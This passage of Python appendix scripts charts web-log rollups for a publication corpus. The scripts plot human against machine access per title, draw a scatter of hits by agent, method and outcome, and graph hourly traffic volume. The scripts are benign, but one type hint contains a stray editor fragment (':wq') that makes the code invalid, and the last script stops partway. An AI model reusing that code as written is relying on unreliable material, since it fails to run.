import os, re, math, csv
from datetime import datetime, timezone, timedelta
from urllib.parse import unquote
import argparse

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Patch

# Paths (already extracted)
manifest_path = "corpus/manifest.tsv"
rollups_dir = "rollups"

out_png = "all.png"
out_svg = "svg-all.svg"
out_tsv = "tsv-all.tsv"

ap = argparse.ArgumentParser()
ap.add_argument(
    "--ma-days",
    type=float,
    default=7.0,
    help="Moving average window in days (default=7.0)",
)
ap.add_argument(
    "--h-amp",
    type=float,
    default=40.0,
    help="Human amplification factor (default=40.0)",
)
args = ap.parse_args()

MA_DAYS = float(args.ma_days)
H_AMP = float(args.h_amp)

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------
RENAME_MAP = {
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",
    "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration":
        "Cognitive Memoisation (CM-2) Protocol",
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) Protocol",
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",
    "Cognitive Memoisation and LLMs: A Method for Exploratory Modelling Before Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",
    "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering":
        "Recent Breaking Change in ChatGPT: The Loss of Semantic Artefact Injection for Knowledge Engineering (2026-12-30)",
}

LEAD_DAYS = 10
ROW_SPACING = 1.0
ROW_MAX = 0.45
ROW_MARGIN = 0.05

# Explicit publication colours
H_COLOR = "#0057B8"   # blue
# G_COLOR = "#008F39"   # green
G_COLOR = "#CD853F" # peru brown
BASELINE_COLOR = "#000000"


def parse_zulu(s: str) -> datetime:
    s = str(s).strip()
    if s.endswith("Z"):
        s2 = s[:-1]
        fmt = "%Y-%m-%dT%H:%M"
        if re.match(r".*:\d\d:\d\d$", s2):
            fmt = "%Y-%m-%dT%H:%M:%S"
        return datetime.strptime(s2, fmt).replace(tzinfo=timezone.utc)
    dt = datetime.fromisoformat(s)
    if dt.tzinfo is None:
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def compact_zulu(dt: datetime) -> str:
    return dt.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%MZ")


def norm_title(s: str) -> str:
    s = str(s).replace("_", " ")
    s = re.sub(r"\s+", " ", s).strip()
    s = s.replace("–", "-").replace("—", "-").replace("−", "-")
    return RENAME_MAP.get(s, s)


def bucket_window_from_filename(fn: str) -> tuple[datetime, datetime, int]:
    m = re.match(
        r"^(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z-to-"
        r"(\d{4})_(\d{2})_(\d{2})T(\d{2})_(\d{2})Z\.tsv$",
        fn,
    )
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    y1, mo1, d1, hh1, mm1, y2, mo2, d2, hh2, mm2 = map(int, m.groups())
    bstart = datetime(y1, mo1, d1, hh1, mm1, tzinfo=timezone.utc)
    bend = datetime(y2, mo2, d2, hh2, mm2, tzinfo=timezone.utc)
    secs = int((bend - bstart).total_seconds())
    if secs <= 0:
        raise ValueError(f"Non-positive bucket window in filename: {fn}")
    return bstart, bend, secs


def classify_path_to_title(path: str):
    p = str(path).split("?", 1)[0]
    p = unquote(p)

    if "-meta/" in p:
        kind = "meta"
        if "/pub-meta/" in p:
            rest = p.split("/pub-meta/", 1)[1]
            parts = rest.split("/", 2)
            if len(parts) >= 2:
                title = parts[1]
            else:
                return (None, None)
        else:
            rest = p.split("-meta/", 1)[1]
            parts = rest.split("/", 1)
            title = parts[1] if len(parts) == 2 else parts[0]
        return (kind, norm_title(title))

    if p.startswith("/pub/"):
        title = p[len("/pub/"):]
        return ("page", norm_title(title))

    return (None, None)


# ---- Load manifest ----
man = pd.read_csv(manifest_path, sep="\t", header=None, names=["title", "safe_file", "pub_date"])
norm_map = {}
pub_dt = {}
for _, r in man.iterrows():
    t = str(r["title"])
    nt = norm_title(t)
    norm_map.setdefault(nt, t)
    try:
        pub_dt[t] = parse_zulu(r["pub_date"])
    except Exception:
        pass

eligible_titles = [t for t in man["title"].tolist() if t in pub_dt]

# ---- Scan rollups and aggregate bucket counts ----
rollup_files = sorted([f for f in os.listdir(rollups_dir) if f.endswith(".tsv")])
if not rollup_files:
    raise RuntimeError("No rollup TSV files found")

first_file = os.path.join(rollups_dir, rollup_files[0])
with open(first_file, "r", newline="") as f:
    reader = csv.reader(f, delimiter="\t")
    header = next(reader)
col_index = {c: i for i, c in enumerate(header)}

path_idx = col_index["path"]
human_get_ok_idx = col_index["human_get_ok"]

# Machine = every non-human actor family retained in the rollups.
# This intentionally includes unattributed metadata plus attributed AI/bot/curlwget/etc.

MACHINE_PREFIXES = ("ai_", "bot_", "curlwget_", "metadata_", "badbot_")

machine_cols = [
    c for c in header
    if c.lower().startswith(MACHINE_PREFIXES)
]

machine_idx = [col_index[c] for c in machine_cols]

H = {}
G = {}

BUCKET_SECONDS = None
min_bucket = None
max_bucket = None

for fn in rollup_files:
    bstart, bend, bsecs = bucket_window_from_filename(fn)
    if BUCKET_SECONDS is None:
        BUCKET_SECONDS = bsecs
    elif BUCKET_SECONDS != bsecs:
        raise ValueError(f"Inconsistent bucket sizes: saw {BUCKET_SECONDS}s then {bsecs}s in {fn}")

    min_bucket = bstart if min_bucket is None else min(min_bucket, bstart)
    max_bucket = bstart if max_bucket is None else max(max_bucket, bstart)

    fp = os.path.join(rollups_dir, fn)
    with open(fp, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        _ = next(reader)
        for row in reader:
            if not row or len(row) <= path_idx:
                continue

            kind, nt = classify_path_to_title(row[path_idx])
            if kind is None or nt is None:
                continue
            if nt not in norm_map:
                continue
            title = norm_map[nt]
            if title not in pub_dt:
                continue

            # Blue: page-only human_get_ok, matching the existing lifecycle semantics.
            if kind == "page":
                try:
                    v = int(row[human_get_ok_idx])
                except Exception:
                    v = 0
                if v:
                    H[(bstart, title)] = H.get((bstart, title), 0) + v

            # Green: all non-human actor buckets on both page and meta carriers.
            s = 0
            for idx in machine_idx:
                try:
                    s += int(row[idx])
                except Exception:
                    pass
            if s:
                G[(bstart, title)] = G.get((bstart, title), 0) + s

MA_BUCKETS = int(round((MA_DAYS * 86400.0) / float(BUCKET_SECONDS)))
if MA_BUCKETS < 1:
    MA_BUCKETS = 1
if MA_BUCKETS % 2 == 0:
    MA_BUCKETS += 1

bucket_list = []
dt = min_bucket
while dt <= max_bucket:
    bucket_list.append(dt)
    dt += timedelta(seconds=BUCKET_SECONDS)

LEAD_BUCKETS = int((LEAD_DAYS * 86400) // BUCKET_SECONDS)
min_rel = -LEAD_BUCKETS
max_rel = max([
    int(((max_bucket - datetime.fromtimestamp((int(pub_dt[t].timestamp()) // BUCKET_SECONDS) * BUCKET_SECONDS, tz=timezone.utc)).total_seconds()) // BUCKET_SECONDS)
    for t in eligible_titles
])
rel_range = np.arange(min_rel, max_rel + 1, dtype=int)
x_days = rel_range.astype(float) * BUCKET_SECONDS / 86400.0

H_series = {}
G_series = {}
for t in eligible_titles:
    pdt = pub_dt[t]
    arr_h = np.zeros(len(rel_range), dtype=float)
    arr_g = np.zeros(len(rel_range), dtype=float)
    pub_epoch = int(pdt.timestamp())
    pub_bucket_epoch = (pub_epoch // BUCKET_SECONDS) * BUCKET_SECONDS
    pub_bucket_dt = datetime.fromtimestamp(pub_bucket_epoch, tz=timezone.utc)

    for bdt in bucket_list:
        rel = int(((bdt - pub_bucket_dt).total_seconds()) // BUCKET_SECONDS)
        if rel < min_rel or rel > max_rel:
            continue
        k = rel - min_rel
        arr_h[k] = H.get((bdt, t), 0)
        arr_g[k] = G.get((bdt, t), 0)
    H_series[t] = arr_h
    G_series[t] = arr_g


def ma_center_zero(x: np.ndarray, win: int) -> np.ndarray:
    if win <= 1:
        return x.astype(float, copy=True)
    if win % 2 == 0:
        win += 1
    k = win // 2
    xp = np.pad(x.astype(float, copy=False), (k, k), mode="constant", constant_values=0.0)
    kernel = np.ones(win, dtype=float) / float(win)
    return np.convolve(xp, kernel, mode="valid")


H_ma = {t: ma_center_zero(H_series[t], MA_BUCKETS) for t in eligible_titles}
G_ma = {t: ma_center_zero(G_series[t], MA_BUCKETS) for t in eligible_titles}

H_log = {t: np.log1p(H_AMP * H_ma[t]) for t in eligible_titles}
G_log = {t: np.log1p(G_ma[t]) for t in eligible_titles}

global_max = 0.0
for t in eligible_titles:
    mx = float(np.nanmax(np.maximum(H_log[t], G_log[t])))
    global_max = max(global_max, mx)
scale = (ROW_MAX / global_max) if global_max > 0 else 0.0

ordered = sorted(eligible_titles, key=lambda t: (pub_dt[t], t))
N = len(ordered)
if ROW_MAX > (ROW_SPACING / 2.0) - ROW_MARGIN:
    raise RuntimeError("Non-overlap constraint violated with current ROW_SPACING/ROW_MAX.")

ypos = {t: float((N - 1) - i) * ROW_SPACING for i, t in enumerate(ordered)}


def row_label(t: str) -> str:
    h_total = int(np.sum(H_series[t]))
    g_total = int(np.sum(G_series[t]))
    return f"{t} ({compact_zulu(pub_dt[t])}) (h:{h_total}, n:{g_total})"


# Optional TSV export for audit / comparison.
with open(out_tsv, "w", newline="") as f:
    w = csv.writer(f, delimiter="\t")
    w.writerow(["title", "publication_z", "human_total", "machine_total"])
    for t in ordered:
        w.writerow([t, compact_zulu(pub_dt[t]), int(np.sum(H_series[t])), int(np.sum(G_series[t]))])


fig, ax = plt.subplots(figsize=(16, max(10, N * 0.45)), dpi=180)

for t in ordered:
    y0 = ypos[t]
    ax.plot(x_days, np.full_like(x_days, y0), lw=0.25, color=BASELINE_COLOR)
    ax.fill_between(x_days, y0, y0 + (H_log[t] * scale), alpha=1.0, color=H_COLOR)
    ax.fill_between(x_days, y0, y0 - (G_log[t] * scale), alpha=1.0, color=G_COLOR)

ax.axvline(0, ls="--", lw=0.8, color=BASELINE_COLOR)

min_day = -LEAD_DAYS
max_day = float((max_rel * BUCKET_SECONDS) / 86400.0)
ax.set_xlim(min_day, max_day)

span = max_day - min_day
if span <= 120:
    minor_step = 7
    major_step = 14
elif span <= 240:
    minor_step = 15
    major_step = 30
elif span <= 480:
    minor_step = 15
    major_step = 60
else:
    major_step = 10
    minor_step = 5


def ticks_anchored_at_zero(min_day: float, max_day: float, step: float) -> np.ndarray:
    lo = int(math.floor(min_day / step))
    hi = int(math.ceil(max_day / step))
    return (np.arange(lo, hi + 1, dtype=int) * step).astype(float)


major = ticks_anchored_at_zero(min_day, max_day, major_step)
minor = ticks_anchored_at_zero(min_day, max_day, minor_step)
ax.set_xticks(major)
ax.set_xticks(minor, minor=True)
ax.grid(True, which="major", axis="x")
ax.grid(False, which="minor", axis="x")
ax.tick_params(axis="x", which="minor", labelbottom=False)

yticks = [ypos[t] for t in ordered]
ax.set_yticks(yticks)
ax.set_yticklabels([row_label(t) for t in ordered], fontsize=7)

ax.set_xlabel("Days relative to publication (UTC/Z)")
ax.set_title(
    f"Human vs All Machines Lifecycle Graphlets (LOG ln(1+x) + MA({MA_DAYS:g}d centered; MA_BUCKET={MA_BUCKETS});\n"
    f"GLOBAL_MAX_LOG={global_max:.6f}; H_AMP={H_AMP}"
)
ax.legend(
    handles=[
        Patch(facecolor=H_COLOR, edgecolor=H_COLOR, label="human (page-only human_get_ok; MA ln(1+H_AMP·x); up)"),
        Patch(facecolor=G_COLOR, edgecolor=G_COLOR, label="machine (Σ non-human rollup buckets; MA; ln(1+x); down)"),
    ],
    loc="upper left",
    framealpha=0.85,
)

fig.canvas.draw()
renderer = fig.canvas.get_renderer()
max_w_px = max(lab.get_window_extent(renderer=renderer).width for lab in ax.get_yticklabels())
fig_w_px = fig.get_size_inches()[0] * fig.dpi
left_frac = min(0.88, max(0.05, (max_w_px + 15) / fig_w_px))
plt.subplots_adjust(left=left_frac, right=0.985, top=0.95, bottom=0.06)
plt.savefig(out_png)
plt.savefig(out_svg)
plt.close()

print(out_png, out_svg, out_tsv)

Appendix G - Scatter Plot

The following code deterministically generates a scatter plot of publications access.

#!/usr/bin/env python3
"""Scatter (corpus titles only) — invariant projection (Appendix A/C)

Run:
  python3 scatter_titles_corpus_HUMAN_200_304_desc.py --rollups rollups.tgz --corpus corpus-11.tgz --out out.png
"""

import argparse, re, tarfile, math
from datetime import datetime, timezone
from urllib.parse import unquote, parse_qs

import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.ticker import LogLocator, LogFormatterMathtext

AGENTS = ['human', 'metadata', 'ai', 'bot', 'curlwget', 'badbot']
AGENT_COLOR = {'human': '#0096FF', 'metadata': '#FFA500', 'ai': '#008000', 'bot': '#FF69B4', 'curlwget': '#800080', 'badbot': '#FF0000'}
METHODS = ['GET', 'POST', 'PUT', 'HEAD', 'OTHER']
METHOD_MARKER = {'GET': 'o', 'POST': '^', 'PUT': 'v', 'HEAD': 'D', 'OTHER': '.'}
OUTCOMES = ['ok', 'redirect', 'error', 'other']
OUTCOME_OVERLAY = {'ok': None, 'redirect': (2, 0, 45), 'error': 'x', 'other': '+'}
THETA = [60, 120, 250, 300]

# ---------------------------------------------------------------------
# CURATOR RENAME MAP (FULL)
# ---------------------------------------------------------------------

RENAME_MAP = {

    # -------------------------------------------------------------
    # First Self-Hosting Epistemic Capture
    # -------------------------------------------------------------
    "Cognitive Memoisation (CM-2): A Human-Governed Protocol for Knowledge Governance and Transport in AI Systems)":
        "First Self-Hosting Epistemic Capture Using Cognitive Memoisation (CM-2)",

    # -------------------------------------------------------------
    # CM-2 Governing Knowledge
    # -------------------------------------------------------------
    "Let's Build a Ship - Cognitive Memoisation for Governing Knowledge in Human - AI Collabortion":
        "Cognitive Memoisation (CM-2) for Governing Knowledge in Human-AI Collaboration",

    # -------------------------------------------------------------
    # Corpus Map
    # -------------------------------------------------------------
    "Cognitive Memoisation: corpus guide":
        "Cognitive Memoisation Corpus Map",

    # -------------------------------------------------------------
    # Plain Language Summary typo
    "Cognitive_Memoisation_and_LLMs:_A_Method_for_Exploratory_Modelling_Before_Formalisation'":
        "Context is Not Just a Window: Cognitive Memoisation as a Context Architecture for Human-AI Collaboration",


    # -------------------------------------------------------------
    # Missing '?' fix
    # -------------------------------------------------------------
    "What Can Humans Trust LLM AI to Do":
        "What Can Humans Trust LLM AI to Do?",

}

fn_re = re.compile('.*/(\\d{4})_(\\d{2})_(\\d{2})T(\\d{2})_(\\d{2})Z-to-(\\d{4})_(\\d{2})_(\\d{2})T(\\d{2})_(\\d{2})Z\\.tsv$')

def bucket_start_from_name(name: str) -> datetime:
    m = fn_re.match(name)
    y, mo, d, hh, mm = map(int, m.group(1,2,3,4,5))
    return datetime(y, mo, d, hh, mm, tzinfo=timezone.utc)

def norm_title(t: str) -> str:
    canon = RENAME_MAP.get(t)
    if (canon):
        return canon

    t = unquote(str(t)).replace("_"," ")
    t = re.sub(r"[–—]","-",t)
    return re.sub(r"\s+"," ",t).strip()

def load_title_set(corpus_tgz: str) -> set:
    with tarfile.open(corpus_tgz, "r:*") as tf:
        mpath = next(n for n in tf.getnames() if n.endswith("manifest.tsv"))
        txt = tf.extractfile(mpath).read().decode("utf-8", errors="replace")
    man = pd.read_csv(pd.io.common.StringIO(txt), sep="\t", dtype=str)
    return set(norm_title(t) for t in man.iloc[:,0].fillna("").astype(str).tolist() if norm_title(t))

def extract_title_from_path(raw_path: str):
    if not isinstance(raw_path, str):
        return None
    p = unquote(raw_path)
    if p.startswith("/pub-meta/"):
        parts = p.split("/")
        if len(parts) >= 4:
            return norm_title(parts[-1])
        return None
    if p.startswith("/pub/"):
        return norm_title(p[len("/pub/"):])
    if p.startswith("/pub-dir/index.php") and "?" in p:
        qs = p.split("?", 1)[1]
        params = parse_qs(qs, keep_blank_values=True)
        if "title" in params and params["title"]:
            return norm_title(params["title"][0])
        if "page" in params and params["page"]:
            return norm_title(params["page"][0])
    return None

def compass_unit(theta_deg: float):
    r = math.radians(theta_deg)
    return np.array([math.sin(r), math.cos(r)], dtype=float)

def bin_key(agent, method, outcome):
    return (AGENTS.index(agent), METHODS.index(method), OUTCOMES.index(outcome))

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--rollups", required=True)
    ap.add_argument("--corpus", required=True)
    ap.add_argument("--out", required=True)
    args = ap.parse_args()

    title_set = load_title_set(args.corpus)

    with tarfile.open(args.rollups, "r:gz") as tf:
        tsv_names = [n for n in tf.getnames() if fn_re.match(n)]
        tsv_names.sort(key=bucket_start_from_name)
        first = tf.extractfile(tsv_names[0])
        header = first.readline().decode("utf-8", errors="replace").rstrip("\n").split("\t")
        idx = {c:i for i,c in enumerate(header)}
        path_col = next(c for c in header if c.lower()=="path")

        col_pat = re.compile(r"^(human|metadata|ai|bot|curlwget)_(get|post|put|head|other)_(ok|redirect|error|other)$", re.I)
        cols=[]
        for c in header:
            m=col_pat.match(c)
            if m:
                cols.append((c, m.group(1).lower(), m.group(2).upper(), m.group(3).lower()))
        badbot_col = next((c for c in header if c.lower()=="badbot_308"), None)

        agg={}
        def add(k,v):
            if v>0:
                agg[k]=agg.get(k,0)+v

        for name in tsv_names:
            f=tf.extractfile(name)
            _=f.readline()
            for raw in f:
                line=raw.decode("utf-8", errors="replace").rstrip("\n")
                if not line:
                    continue
                parts=line.split("\t")
                if len(parts)!=len(header):
                    continue
                raw_path=parts[idx[path_col]]
                title=extract_title_from_path(raw_path)
                if title is None or title not in title_set:
                    continue
                for c,agent,method,outcome in cols:
                    try: v=int(parts[idx[c]])
                    except: v=0
                    add((title,agent,method,outcome), v)
                if badbot_col is not None:
                    try: bb=int(parts[idx[badbot_col]])
                    except: bb=0
                    add((title,"badbot","GET","redirect"), bb)

    df=pd.DataFrame([{"title":t,"agent":a,"method":m,"outcome":o,"hits":h}
                     for (t,a,m,o),h in agg.items() if h>0])
    if df.empty:
        raise RuntimeError("No hits after filtering to corpus titles.")

    human_ok = df[(df.agent=="human") & (df.method=="GET") & (df.outcome=="ok")].groupby("title")["hits"].sum()
    human_redir = df[(df.agent=="human") & (df.method=="GET") & (df.outcome=="redirect")].groupby("title")["hits"].sum()
    human_200_304 = (human_ok.add(human_redir, fill_value=0)).astype(float)

    present_titles=set(df["title"].unique())
    titles_sorted = sorted(present_titles, key=lambda t: (-human_200_304.get(t,0.0), t))
    N=len(titles_sorted)
    y_index = {t: float((N-1)-i) for i,t in enumerate(titles_sorted)}
    df["y"]=df["title"].map(y_index).astype(float)
    df["bin_rank"]=df.apply(lambda r: bin_key(r["agent"], r["method"], r["outcome"]), axis=1)

    fig_h = max(7, 0.28*N + 2.8)
    fig, ax = plt.subplots(figsize=(18, fig_h))
    ax.set_xscale("log")
    xmin = max(1, float(df["hits"].min()))
    xmax = float(df["hits"].max())
    ax.set_xlim(xmin*0.9, xmax*1.1)
    ax.set_ylim(-1, N)

    ax.set_yticks([y_index[t] for t in titles_sorted])
    ax.set_yticklabels([t for t in titles_sorted], fontsize=10)

    ax.xaxis.set_major_locator(LogLocator(base=10.0))
    ax.xaxis.set_major_formatter(LogFormatterMathtext())
    ax.xaxis.set_minor_locator(LogLocator(base=10.0, subs=np.arange(2,10)*0.1))
    ax.grid(True, which="major", axis="x", linewidth=0.9)
    ax.grid(True, which="minor", axis="x", linewidth=0.35)

    for t in titles_sorted:
        y=y_index[t]
        ax.hlines(y, ax.get_xlim()[0], ax.get_xlim()[1], linewidth=0.3, alpha=0.4)

    ax.set_xlabel("Hits (log scale)")
    ax.set_title("Scatter (corpus titles only): colour=agent, shape=method, overlay=strike — Y ordered by HUMAN_200_304")

    base_s=43.0
    r_points = math.sqrt(base_s)/2.0
    dpi=fig.dpi
    r_px = r_points*dpi/72.0
    d_px = 0.75*r_px
    overlap_allow_px = 0.75*r_px
    min_sep_px = 2.10 * r_px - overlap_allow_px

    p0 = ax.transData.transform((1.0, 0.0))
    p1 = ax.transData.transform((1.0, 0.45))
    row_band_px = abs(p1[1]-p0[1])
    inv = ax.transData.inverted()

    placed_px_by_row = {t: [] for t in titles_sorted}

    def ok_place(px, placed_list):
        for q in placed_list:
            if np.linalg.norm(px-q) < min_sep_px:
                return False
        return True

    for t in titles_sorted:
        row = df[df["title"]==t].copy()
        y_base = y_index[t]

        anchor = row[(row.agent=="human") & (row.method=="GET") & (row.outcome=="ok")]
        if not anchor.empty:
            x=float(anchor["hits"].iloc[0])
            P0_px=ax.transData.transform((x, y_base))
            placed_px_by_row[t].append(P0_px)
            ax.scatter([x],[y_base], s=base_s, marker=METHOD_MARKER["GET"], c=AGENT_COLOR["human"], linewidths=0, zorder=3)

        rem = row[~((row.agent=="human") & (row.method=="GET") & (row.outcome=="ok"))].sort_values("bin_rank")
        for _, r in rem.iterrows():
            agent=r["agent"]; method=r["method"]; outcome=r["outcome"]; x=float(r["hits"])
            P0_px=ax.transData.transform((x, y_base))
            placed_list=placed_px_by_row[t]
            chosen_px=None

            if ok_place(P0_px, placed_list):
                chosen_px=P0_px
            else:
                k_max=1
                attempts=0
                while chosen_px is None and attempts < 200:
                    attempts += 1
                    for theta in THETA:
                        for k in range(1, k_max+1):
                            cand = P0_px + (k*d_px)*compass_unit(theta)
                            if abs(cand[1]-P0_px[1]) <= row_band_px and ok_place(cand, placed_list):
                                chosen_px=cand
                                break
                        if chosen_px is not None:
                            break
                    if chosen_px is None:
                        k_max += 1
                        if k_max > 6:
                            for q in placed_list:
                                for theta in THETA:
                                    cand = q + d_px*compass_unit(theta)
                                    if abs(cand[1]-P0_px[1]) <= row_band_px and ok_place(cand, placed_list):
                                        chosen_px=cand
                                        break
                                if chosen_px is not None:
                                    break
                        if k_max > 12:
                            chosen_px=P0_px
                            break

            if chosen_px is not None and abs(chosen_px[1]-P0_px[1]) < 0.5 and not ok_place(P0_px, placed_list):
                cand = P0_px + d_px*compass_unit(THETA[0])
                if abs(cand[1]-P0_px[1]) <= row_band_px and ok_place(cand, placed_list):
                    chosen_px=cand

            placed_list.append(chosen_px)
            x_d, y_d = inv.transform(chosen_px)

            ax.scatter([x_d],[y_d], s=base_s if method!="OTHER" else 44.0,
                       marker=METHOD_MARKER.get(method,"."), c=AGENT_COLOR[agent], linewidths=0, zorder=3)

            ov=OUTCOME_OVERLAY.get(outcome)
            if ov is not None:
                ax.scatter([x_d],[y_d], s=92.0, marker=ov, c="black", linewidths=2.0, zorder=4)

    handles=[]
    handles.append(Line2D([0],[0], linestyle="None", marker=None, label="Agent (colour)"))
    for a in AGENTS:
        handles.append(Line2D([0],[0], marker="o", linestyle="None",
                              markerfacecolor=AGENT_COLOR[a], markeredgecolor=AGENT_COLOR[a], label=a))
    handles.append(Line2D([0],[0], linestyle="None", marker=None, label="Method (shape)"))
    for m in METHODS:
        handles.append(Line2D([0],[0], marker=METHOD_MARKER[m], linestyle="None",
                              color="black", markerfacecolor="black", label=m))
    handles.append(Line2D([0],[0], linestyle="None", marker=None, label="Outcome overlay (black)"))
    handles.append(Line2D([0],[0], marker="x", linestyle="None", color="black", label="x = error"))
    handles.append(Line2D([0],[0], marker=(2,0,45), linestyle="None", color="black", label="/ = redir"))
    handles.append(Line2D([0],[0], marker="+", linestyle="None", color="black", label="+ = other"))
    handles.append(Line2D([0],[0], linestyle="None", marker=None, color="black", label="none = ok"))

    leg=ax.legend(handles=handles, title="Legend", loc="lower right", framealpha=0.85)
    leg.get_frame().set_linewidth(0.8)

    # plt.subplots_adjust(left=0.28, right=0.98, top=0.92, bottom=0.10)
    # --- BEGIN delta: auto-fit left margin to longest y tick label ---
    fig.canvas.draw()  # needed to get a renderer

    renderer = fig.canvas.get_renderer()
    ticklabels = ax.get_yticklabels()

    max_px = 0
    for lab in ticklabels:
        bb = lab.get_window_extent(renderer=renderer)
        max_px = max(max_px, bb.width)


    # convert pixels -> figure fraction and add padding
    pad_px = 18
    left = (max_px + pad_px) / (fig.get_size_inches()[0] * fig.dpi)

    # clamp so we don't blow the plot away
    left = min(max(left, 0.12), 0.55)

    plt.subplots_adjust(left=left, right=0.98, top=0.92, bottom=0.10)
    # --- END delta ---`
    plt.savefig(args.out, dpi=220)
    plt.close(fig)

if __name__ == "__main__":
    main()

Appendix H - mib projection

The following code takes the rollups and collects the MiB from the hourly buckets

#!/usr/bin/env python3
"""
Generate MiB/hour time series and graph from rollups only.

Assumptions (matches your rollup format):
- Each rollup file is a 1-hour bucket TSV.
- Filename contains bucket window like:
    YYYY_MM_DDThh_mmZ-to-YYYY_MM_DDThh_mmZ.tsv
- Each TSV row has a 'total_bytes' column (bytes for that path in that bucket).
- To get total bucket traffic, we SUM total_bytes across all rows in the file.

Outputs:
- time_series_mib_hourly_from_rollups.tsv
- mib_hourly_log_ma3_1000px.png
"""

import argparse
import csv
import os
import re
from datetime import datetime, timezone
from typing import Optional, Tuple, List, Dict

import pandas as pd
import matplotlib.pyplot as plt


FILENAME_RE = re.compile(
    r"^(?P<y1>\d{4})_(?P<m1>\d{2})_(?P<d1>\d{2})T(?P<h1>\d{2})_(?P<min1>\d{2})Z"
    r"-to-"
    r"(?P<y2>\d{4})_(?P<m2>\d{2})_(?P<d2>\d{2})T(?P<h2>\d{2})_(?P<min2>\d{2})Z"
    r"\.tsv$"
)


def parse_bucket_from_filename(fn: str) -> Tuple[datetime, datetime]:
    m = FILENAME_RE.match(fn)
    if not m:
        raise ValueError(f"Unparseable rollup filename: {fn}")
    g = m.groupdict()
    start = datetime(int(g["y1"]), int(g["m1"]), int(g["d1"]), int(g["h1"]), int(g["min1"]), tzinfo=timezone.utc)
    end   = datetime(int(g["y2"]), int(g["m2"]), int(g["d2"]), int(g["h2"]), int(g["min2"]), tzinfo=timezone.utc)
    return start, end


def read_bucket_total_bytes(path: str, server_filter: Optional[str] = None) -> Tuple[int, Optional[str]:wq]:
    """
    Returns (sum_total_bytes, inferred_server_name_or_None).

    If server_filter is set and 'server_name' column exists, only rows matching are counted.
    """
    total = 0
    inferred_server = None

    with open(path, "r", newline="") as f:
        reader = csv.reader(f, delimiter="\t")
        header = next(reader)

        col = {name: i for i, name in enumerate(header)}
        if "total_bytes" not in col:
            raise RuntimeError(f"Missing 'total_bytes' column in {path}")

        idx_total_bytes = col["total_bytes"]
        idx_server = col.get("server_name", None)

        for row in reader:
            if not row:
                continue

            if idx_server is not None and len(row) > idx_server:
                sname = row[idx_server]
                if inferred_server is None and sname:
                    inferred_server = sname

                if server_filter is not None and sname != server_filter:
                    continue
            elif server_filter is not None:
                # asked to filter but file has no server_name col
                continue

            try:
                total += int(row[idx_total_bytes])
            except Exception:
                # treat malformed as zero
                pass

    return total, inferred_server


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--rollups_dir", default="rollups", help="Directory containing hourly rollup TSVs")
    ap.add_argument("--server", default=None, help="Optional server_name filter (exact match)")
    ap.add_argument("--out_tsv", default="time_series_mib_hourly_from_rollups.tsv", help="Output TSV")
    ap.add_argument("--out_png", default="mib_hourly_log_ma3_1000px.png", help="Output PNG graph")
    ap.add_argument("--dpi", type=int, default=100, help="DPI (default: 100)")
    ap.add_argument("--width_px", type=int, default=1000, help="Output width in pixels (default: 1000)")
    ap.add_argument("--height_px", type=int, default=500, help="Output height in pixels (default: 500)")
    args = ap.parse_args()

    files = sorted([f for f in os.listdir(args.rollups_dir) if f.endswith(".tsv")])

    rows: List[Dict] = []
    inferred_server_global = None

    for fn in files:
        try:
            start, end = parse_bucket_from_filename(fn)
        except ValueError:
            # skip non-rollup TSVs that don't match the bucket naming convention
            continue

        fp = os.path.join(args.rollups_dir, fn)
        total_bytes, inferred_server = read_bucket_total_bytes(fp, server_filter=args.server)

        if inferred_server_global is None and inferred_server:
            inferred_server_global = inferred_server

        bucket_seconds = int((end - start).total_seconds())
        mib = total_bytes / (1024.0 * 1024.0)
        mib_per_second = mib / bucket_seconds if bucket_seconds > 0 else 0.0

        rows.append(
            {
                "server_name": args.server if args.server else (inferred_server or inferred_server_global or ""),
                "bucket_start": start.isoformat().replace("+00:00", "Z"),
                "bucket_end": end.isoformat().replace("+00:00", "Z"),
                "bucket_seconds": bucket_seconds,
                "total_bytes": total_bytes,
                "MiB": mib,
                "MiB_per_second": mib_per_second,
            }
        )

    if not rows:
        raise SystemExit("No rollup TSVs matched the expected filename pattern in rollups_dir.")

    df = pd.DataFrame(rows)
    df["bucket_start"] = pd.to_datetime(df["bucket_start"], utc=True)
    df = df.sort_values("bucket_start").reset_index(drop=True)

    # MA(3) across hourly buckets; first 2 points undefined
    df["MA3_MiB"] = df["MiB"].astype(float).rolling(window=3, min_periods=3).mean()

    # Write derived series TSV (audit)
    out_df = df.copy()
    out_df["bucket_start"] = out_df["bucket_start"].dt.strftime("%Y-%m-%dT%H:%M:%SZ")
    out_df.to_csv(args.out_tsv, sep="\t", index=False)

    # Plot at requested pixel size
    fig_w_in = args.width_px / args.dpi
    fig_h_in = args.height_px / args.dpi
    plt.figure(figsize=(fig_w_in, fig_h_in), dpi=args.dpi)

    plt.plot(df["bucket_start"], df["MiB"], label="MiB/hour")
    plt.plot(df["bucket_start"], df["MA3_MiB"], label="MA(3) MiB/hour")

    # Log paper + graticules
    plt.yscale("log")
    plt.grid(True, which="major")
    plt.grid(True, which="minor")

    # X ticks every 7 days, oblique
    start = df["bucket_start"].min().normalize()
    end = df["bucket_start"].max().normalize()
    tick_locs = pd.date_range(start=start, end=end, freq="7D", tz="UTC")
    plt.xticks(tick_locs, rotation=45, ha="right")

